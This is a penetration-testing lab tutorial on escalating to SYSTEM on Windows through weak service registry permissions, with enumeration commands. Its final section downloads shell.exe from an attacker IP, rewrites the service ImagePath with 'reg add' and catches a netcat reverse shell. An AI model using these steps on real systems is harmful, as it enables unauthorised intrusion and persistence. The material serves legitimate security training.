Windows Privilege Escalation - Logon Autostart Execution
Introduction (page 3)
Weak Registry Permission (page 4)
  Prerequisite (page 4)
  Lab Setup (page 4)
Abusing Weak Registry Services (page 6)
  Enumerate Vulnerable Registry key using Accesschk.exe (page 6)
  Enumerate Vulnerable Registry key using Powershell (page 7)
  Enumerate Vulnerable Registry key using WinPEASx64 (page 8)
  Create Malicious Executable (page 8)
Page 2 of 9
Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access
to Windows components including services, files, and registry entries. Exploiting Weak Registry
Permissions is one technique to increase privileges.
Introduction
Windows Registry
The registry is a system-defined database in which applications and system components store and retrieve
configuration data. The registry is a hierarchical database that contains data that is critical for the
operation of Windows and the applications and services that run on Windows.
You can use Registry Editor to do the following actions:
Weak Registry Permission
By hijacking the registry entries used by services, attackers can run their own payloads. Attackers may exploit weak registry permissions to redirect a service from its originally configured executable to one they control, so that their unauthorized code runs when the service starts.
Mitre ID: T1574.011
Tactics: Privilege Escalation & Persistence
Platforms: Windows
Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Tools: SubinACL, PowerUP.ps1, Winpeas.
Condition: The target machine has already been compromised with low-privilege access, for example through Metasploit or Netcat.
Objective: Escalate a low-privileged user to NT AUTHORITY\SYSTEM by exploiting the weak registry key.
Lab Setup
Step 1: Run CMD as administrator and execute the command below to create a service named Pentest inside the /temp directory.
Step 2: To make the service vulnerable, we assign it some dangerous permissions, using SubInACL to change the permissions of the service.
NOTE:
SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools to work with
security permissions in Windows. This tool is capable of changing the permissions of files, folders,
registry keys, services, printers, cluster shares, and various other types of objects.
In this case, we have granted a user’s permissions to suspend (pause/continue), start, and stop (restart)
a service.
Step 3: After downloading SubInACL, execute the following command to assign PTO (pause/continue, start, stop) permissions to the user "ignite" on the "Pentest" service.
Abusing Weak Registry Services
Enumerate Vulnerable Registry key using Accesschk.exe
An attacker can escalate privileges by exploiting Weak Registry permission if the current user has
permission to alter Registry keys associated with the service.
Following an initial foothold, we can query for service registry keys permissions using the accesschk.exe
Sysinternals tool.
nc -lvp 1245
accesschk.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services
As a result, we found that ALL Access is granted to Authenticated Users on the "Pentest" registry key.
Enumerate Vulnerable Registry key using Powershell
With the following PowerShell command, we query the ACL of the service's registry key.
powershell
Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\pentest | fl
Enumerate Vulnerable Registry key using WinPEASx64
Alternatively, the automated script WinPEASx64 also enumerates weak service registry permissions, which is another post-exploitation enumeration method for this misconfiguration.
Create Malicious Executable
cd c:\Users\Public
powershell wget http://192.168.1.3/shell.exe -o shell.exe
reg add "HKLM\system\currentcontrolset\services\pentest" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Public\shell.exe" /f
net start pentest
When the service starts or is restarted, the adversary-controlled program executes, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is configured to run under (local/domain account, SYSTEM, LocalService, or NetworkService).
Thus, as soon as the service launches, the attacker receives a reverse connection in the new netcat session as NT AUTHORITY\SYSTEM.
nc -lvp 8888
whoami
References:
https://attack.mitre.org/techniques/T1574/011/
https://docs.microsoft.com/en-us/windows/win32/sysinfo/registr
www.ignitetechnologies.in